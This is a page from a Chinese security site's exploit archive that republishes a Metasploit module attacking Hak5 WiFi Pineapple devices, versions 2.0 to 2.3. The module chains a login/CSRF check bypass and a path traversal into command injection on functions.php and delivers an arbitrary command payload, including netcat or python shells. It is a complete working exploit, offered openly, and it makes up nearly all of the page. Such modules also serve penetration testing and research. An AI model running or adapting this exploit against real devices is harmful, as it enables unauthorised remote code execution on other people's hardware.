首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Hak5 WiFi Pineapple Preconfiguration Command Injection
来源:metasploit.com 作者:catatonicprime 发布时间:2016-10-19  
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Hak5 WiFi Pineapple Preconfiguration Command Injection',
      'Description'    => %q{
      This module exploits a login/csrf check bypass vulnerability on WiFi Pineapples version 2.0 <= pineapple < 2.4.
      These devices may typically be identified by their SSID beacons of 'Pineapple5_....';
      Provided as part of the TospoVirus workshop at DEFCON23.
      },
      'Author'         => ['catatonicprime'],
      'License'        => MSF_LICENSE,
      'References'     => [ ],
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Privileged'     => false,
      'Payload'        => {
        'Space'        => 2048,
        'DisableNops'  => true,
        'Compat'       =>
          {
            'PayloadType' => 'cmd',
            'RequiredCmd' => 'generic python netcat telnet'
          }
      },
      'Targets'        =>
        [
          [ 'WiFi Pineapple 2.0.0 - 2.3.0', {} ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Aug 1 2015'))

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'Path to the command injection', '/components/system/configuration/functions.php' ]),
        Opt::RPORT(1471),
        Opt::RHOST('172.16.42.1')
      ]
    )

    deregister_options(
      'ContextInformationFile',
      'DOMAIN',
      'DigestAuthIIS',
      'EnableContextEncoding',
      'FingerprintCheck',
      'HttpClientTimeout',
      'NTLM::SendLM',
      'NTLM::SendNTLM',
      'NTLM::SendSPN',
      'NTLM::UseLMKey',
      'NTLM::UseNTLM2_session',
      'NTLM::UseNTLMv2',
      'SSL',
      'SSLVersion',
      'VERBOSE',
      'WORKSPACE',
      'WfsDelay',
      'Proxies',
      'VHOST'
    )
  end

  def cmd_uri
    normalize_uri('includes', 'css', 'styles.php', '../../..', target_uri.path)
  end

  def cmd_inject(cmd)
    res = send_request_cgi(
      'method'     => 'POST',
      'uri'        => cmd_uri,
      'vars_get'   => {
        'execute'  => "" # Presence triggers command execution
      },
      'vars_post'  => {
        'commands' => cmd
      })
    res
  end

  def check
    res = cmd_inject("echo")
    if res && res.code == 200 && res.body =~ /Executing/
      return Exploit::CheckCode::Vulnerable
    end
    Exploit::CheckCode::Safe
  end

  def exploit
    print_status('Attempting to bypass login/csrf checks...')
    unless check
      fail_with(Failure::NoAccess, 'Failed to bypass login/csrf check...')
    end
    print_status('Executing payload...')
    cmd_inject("#{payload.encoded}")
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·OpenNMS Java Object Unserializ
·Hak5 WiFi Pineapple Preconfigu
·Windows DeviceApi CMApi - User
·Oracle Netbeans IDE 8.1 - Dire
·Windows DeviceApi CMApi PiCMOp
·MiCasa VeraLite - Remote Code
·Cgiemail 1.6 - Source Code Dis
·SAP NetWeaver KERNEL 7.0 < 7.5
·LanSpy 2.0.0.155 - Local Buffe
·Microsoft Edge - Array.map Hea
·Pluck CMS 4.7.3 - Cross-Site R
·Microsoft Edge - Function.appl
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved